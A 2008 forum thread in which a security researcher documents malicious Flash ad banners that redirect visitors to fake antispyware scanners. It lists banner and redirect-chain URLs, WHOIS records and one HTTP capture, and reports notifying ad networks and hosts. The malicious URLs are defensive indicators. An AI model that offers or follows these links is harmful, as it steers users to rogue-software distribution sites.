Mp3sdir.com
Niobemenendez.com
Penobetons.com
Plagiarism-free-thesis.info
Plusarticles.info
Pointarticles.info
Pornosaitov.net
Rape-reviews.com
Rusexvideo.net
Salearticles.info
Shtukaturko.com
Sipuchka.com
Skaappi.org
Spako-ru.com
Stroyangar.com
Stroydomov.com
Stroyofis.com
Stroysklad.com
Teplodoms.com
Teploizol.com
Thfonline.org
Truthcommissionconference.org
Webflikr.info
Writingblog.biz

Kimberly

Jun 10 2008, 02:35 PM

New banner : Nike

Forwarded by a contact.

Banner.

trueffect-cdn.com/20880/728x90.swf

Campaign.

track.trackads.net/statsa.php?campaign=20880&u=1213102076650
track.trackads.net/swf/gnida.swf?campaign=20880&u=1213102076650&
paramss=[removed]

track.trackads.net/statss.php?campaign=20880&u=1213102076650&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=[removed]&cid=[removed]&parid=[removed]
spywaredestructor.com/scanner/scan.php?landid=[removed]&depid=&cid=&parid=&bs=1&lang=en
spywaredestructor.com/scanner/scan.php?landid=[removed]&depid=&cid=&parid=&lang=en

trueffect-cdn.com - 67.205.93.101

Website Title: TruEffect delivers next generation online advertising solutions for agencies, advertisers and publishers.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-29
Expires: 2009-05-29
Name Server: NS1.TRUEFFECT-CDN.COM (has 1 domains)
Name Server: NS2.TRUEFFECT-CDN.COM
Whois Server: whois.estdomains.com

Server Type: Microsoft-IIS/6.0
IP Location - Ukraine - Private Customer - Iweb
Dedicated Hosting: trueffect-cdn.com is hosted on a dedicated server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: TRUEFFECT-CDN.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Record last updated on 2008-06-01
______________________________

You might notice that the IP of atlas-ads.com; another bad advertiser; is 67.205.93.102, which makes them neighbours.

Just like with atlas-ads.com in the past, don't get fooled when you visit the homepage of trueffect-cdn.com, they don't have a homepage but redirect you to a legit advertising company named TrueEffect Inc. TrueEffect Inc has earned certified status in Microsoft Corp.'s Partner Program on February 12, 2007.

CODE

URL = http://trueffect-cdn.com
UAG = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
AEN =
REQ = GET; VER = 1.1; FMT = AUTO
Sending request:
GET / HTTP/1.1
Host: trueffect-cdn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Connection: close

• Finding host IP address...
• Host IP address = 67.205.93.101
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...

Receiving Header:
HTTP/1.1·302·Found(CR)(LF)
X-Powered-By:·PHP/5.2.5-3(CR)(LF)
Location:·http://trueffect.com(CR)(LF)
Content-type:·text/html(CR)(LF)
Content-Length:·0(CR)(LF)
Connection:·close(CR)(LF)
Date:·Tue,·10·Jun·2008·14:21:47·GMT(CR)(LF)
Server:·lighttpd/1.5.0(CR)(LF)
(CR)(LF)

spywaredestructor.com - 67.205.75.9

spywaredestructor.com still has the same IP.

spywaredestructor.com - 67.205.75.9

Website Title: .: SpywareDestructor - the best antispyware ever :. ICANN Registrar: ESTDOMAINS, INC.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-17
Expires: 2009-01-17
Name Server: NS.SPYWAREDESTRUCTOR.COM
Name Server: NS1.US.EDITDNS.NET (has 9,561 domains)
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET
Whois Server: whois.estdomains.com

Server Type: lighttpd/1.4.18
IP Address: 67.205.75.9
IP Location - Ukraine - Individual

Reverse IP: 2 other sites hosted on this server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: SPYWAREDESTRUCTOR.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Current Websites.

Antispywaredeluxe.com
pidosoftware.com
Spywaredestructor.com

Kimberly

Jun 12 2008, 04:02 PM

ifrance.com - paysagevirtuel.ifrance.com

Curves malvertizement present on personal websites - paysagevirtuel.ifrance.com in this case - hosted on ifrance.com. This is not the first time we had echos about malicious banners being present over there. The creative is hosted on their own website and we see Gemini Internactive at work again. Fuse Kit 2.1.4 has been used in this creative.

Screenshot in situ.

Banner.

image.ifrance.com/img/pub/geminiinternactive/curves/curves_728x90.swf

Campaign.

adoptserver.info/_online.gif?utmwv=[removed]

windowsxp-privacy.net/?id=987650085
fastwebway.com/soft.php?aid=024213&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024213

Note: Reported here

Kimberly

Jun 13 2008, 12:23 AM

Ringtones - Updated Campaign

Forwarded by a contact.

The ringtones banner has been updated again. Fuse Kit 2.1.4 has been used in this creative and the malvertizement fails the Adopstools test.

Banner.

Campaign.

openadstream.net/ad07.gif?url=[removed]

xp-vista-update.net/?id=34866151134
fastwebway.com/soft.php?aid=011810&d=0&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77011810

Caution

A word of caution to those manipulating the SWF files for analysis. The creative reports back to 67.210.12.62 as seen below.

Note: The name of the application has been removed on purpose.

openadstream.net - 67.210.12.62

Website Title: None given.

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-12
Expires: 2009-01-12
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,902 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

IP Location - Texas - Freeport - Cernel Inc
Dedicated Hosting: openadstream.net is hosted on a dedicated server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: OPENADSTREAM.NET

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

www.gamerevolution.com

A malicious banner *might* still be present on www.gamerevolution.com. All information is highly appreciated.

Kimberly

Jun 13 2008, 06:26 PM

New banner - diamondharmony.com

A completely new jewelry malvertizement featuring diamondharmony.com has been forwarded to us by a contact.

Banner.

Associated URL.

adoptserver.info/_stat.gif?url=[removed]

Note: I will post more information about other links if possible after a more complete examination of the banner.

Although many older banners are still present on the web (see below), this creative is part of a new series using Fuse Kit 2.1.4. just like the new curves & ringtones ones.

screensavers.com

As said earlier, many older advertisements are still present on the web. Screensavers.com is a perfect example of this phenomenon. The alert was given a couple of days ago, the site seems clean now upon first sight but the direct links still work.

Screenshots in situ.

Banner n°1 - ShopAtHomeTV.

c5.zedo.com/OzoDB/j/e/260649/V4/120x600.swf

Campaign.

mysurvey4u.com/crossdomain.xml
mysurvey4u.com/stats.php?campaign=shesmall&u=1212639076765

The campaign is inactive but information is still transmitted to the server.

stats.php

CODE
f(CR)(LF)
stats=620208842(CR)(LF)
0(CR)(LF)
(CR)(LF)

______________________________

Banner n°2 - Traveltray.

c13.zedo.com/OzoDB/n/e/260653/V3/728_INTL.swf

Campaign.

adtraff.com/statsa.php?campaign=l9rge5tx&u=1212640525488
adtraff.com/swf/gnida.swf?campaign=l9rge5tx&u=1212640525488
adtraff.com/statss.php?campaign=l9rge5tx&u=1212640525488
blessedads.com/?cmpid=l9rge5tx&adid=728
prevedmarketing.com/?tmn=mwatmpsmcmp&aid=l9rge5tx&lid=728&ax=1&ed=2&mt_info=4197_1814_16615&rdr=1
scanner2.malware-scan.com/18_swp/?tmn=null&aid=l9rge5tx_ma18s_mb1sct&lid=728&affid=&ax=1&ed=2&mt_info=4197_1814_16615:5745_0_16606&rdr=2
bucksbill.com/.stats/refil.php?p=18&aid=l9rge5tx_ma18s_mb1sct&lid=728&affid=keyin

Kimberly

Jun 15 2008, 02:33 PM

www.lyricsdownload.com - ringtones

2 malicious ringtones banners are present on www.lyricsdownload.com. A couple of days ago we saw the 160x600 updated version of the banner, this time the 728x90 and 300x250 went live. Both are using Fuse Kit 2.1.4 again.

Screenshot in situ.

Banner.

banners.valuead.com/omd/37/63.swf

Campaign.

openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=65254419402
xponlinescanner.com/soft.php?aid=011803&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011803

______________________________

Screenshot in situ.

Banner.

banners.valuead.com/omd/39/62.swf

Campaign.

openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=55366518900
xponlinescanner.com/soft.php?aid=011804&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011804

Again a word of caution to those manipulating the SWF files for analysis. The creative reports back to openadstream.net - 67.210.12.62

Kimberly

Jun 15 2008, 04:45 PM

www.lyricsandsongs.com - ringtones

www.lyricsandsongs.com is also showing 2 malicious ringtones banners. Ya even get the 2 for the prize of 1 as seen on the screenshot below. We even see the redirect happen live, notice xponlinescanner.com in the address & status bar.

Screenshot in situ.

Banner n°1.

This is the same banner and campaign as seen on www.lyricsdownload.com earlier today.

banners.valuead.com/omd/37/63.swf

Campaign.

openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=65254419402
xponlinescanner.com/soft.php?aid=011803&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011803

______________________________

Banner n°2.

banners.valuead.com/omd/38/61.swf

Campaign.

openadstream.net/ad09.gif?[removed]

xp-vista-update.net/?id=95182371212
xponlinescanner.com/soft.php?aid=011802&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011802

Again a word of caution to those manipulating the SWF files for analysis. The creative reports back to openadstream.net - 67.210.12.62

Kimberly

Jun 15 2008, 06:31 PM

www.bigoo.ws - ringtones

Never two without three .... www.bigoo.ws, a website with Graphics, Backgrounds, Icons, Pimp my profile stuff for MySpace, Friendster, Hi5 ... etc.

Screenshots in situ.

The culprit ... yep ringtones again. The 160x600 version is also present on the website, I just wasn't fast enough to capture it.

Banners & and campaign are the same as www.lyricsandsongs.com - www.lyricsdownload.com
______________________________

Banner 300x250.

banners.valuead.com/omd/39/62.swf

Campaign.

openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=55366518900
xponlinescanner.com/soft.php?aid=011804&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011804

______________________________

Banner 160x600.

banners.valuead.com/omd/38/61.swf

Campaign.

openadstream.net/ad09.gif?[removed]

xp-vista-update.net/?id=95182371212
xponlinescanner.com/soft.php?aid=011802&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011802

Kimberly

Jun 18 2008, 03:34 PM

www.lyricsdownload.com & www.lyricsandsongs.com & www.bigoo.ws

Shortly after contacting ValueAd Inc, I received an email saying that their support services and the customers got notified about the problem. Although yesterday the ringtones malvertizement was still being displayed, all 3 sites “seem” clean now.

ifrance.com

The curves malvertizement is still being displayed at ifrance.com as seen below.

ifrance has been contacted by me and the site owner through their support system. Furthermore, iEUROP has also been notified by me about the problem. Nothing has been done yet, this is again unacceptable. When are ifrance / iEUROP going to realize that a responsible attitude towards their customers and visitors is needed instead of ignoring reports about malware? The same goes for any other advertisers, website owners, hosting companies … .

Do not visit websites hosted on ifrance.com unless you have taken appropriate measures in order to protect yourself. Either block Flash content from being displayed, either block anything coming from image.ifrance.com/img/pub in your ad blocker until further notice.

Kimberly

Jun 19 2008, 09:24 PM

Latest news

Shockwave in the news again.

Shockwave exploits

thx to MAD for the heads up.
______________________________

ifrance.

The curves malvert is still up and active, furthermore their services persist remaining silent. MAD made a nice write up about the SWF problem in French with links to different online articles.
iFRANCE, nous avons un problème...

Kimberly

Jun 21 2008, 02:26 PM

ifrance.com is still serving malvertizements

On Jun 12 2008, 06:02 PM we first did catch the malicious banner being displayed at websites hosted on ifrance.com. Today, 9 days later, ifrance hasn't replied to any of our notifications. The malvertizement is still redirecting people to xponlinescanner.com, no matter what site hosted at ifrance they visit.

If you have a site hosted at ifrance contact them please, this mess has to be cleaned up. pharmacies-gms.ifrance.com, paysagevirtuel.ifrance.com ... how many other sites are hosted over there? Maybe it should hit the headlines in some newspapers, people are quite keener in responding. We learned that when Yahoo was displaying malverts.

Kimberly

Jun 23 2008, 01:42 PM

ifrance.com - isuisse.com

We've got a serious problem going on here. Not only the curves malvertizement is being displayed on ALL websites being hosted on *.ifrance.com but also on *.isuisse.com as reported here today by the site owner of hb9mdl.isuisse.com.
Of course ifrance and iEUROP have been contacted again by several persons, including me.

Note: the forum software is cutting of the direct link, my apologies for that. Copy / paste the line below but be sure to remove the space between & and #
forum.pcastuces.com/probleme_acces_site_internet-f2s13386.htm?page=1& #2862245

Screenshot in situ.

Banner.

image.ifrance.com/img/pub/geminiinternactive/curves/curves_728x90.swf

Campaign.

adoptserver.info/_online.gif?utmwv=[removed]

windowsxp-privacy.net/?id=987650085
fastwebway.com/soft.php?aid=024213&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024213

Click on the image to enlarge

iEUROP

QUOTE
Figures overview

+ 15 internet portals
+ 22 millions of visitors of all the portals (Origin Mediametrie eStat)
+ 110 millions of visited pages
+ 4 500 0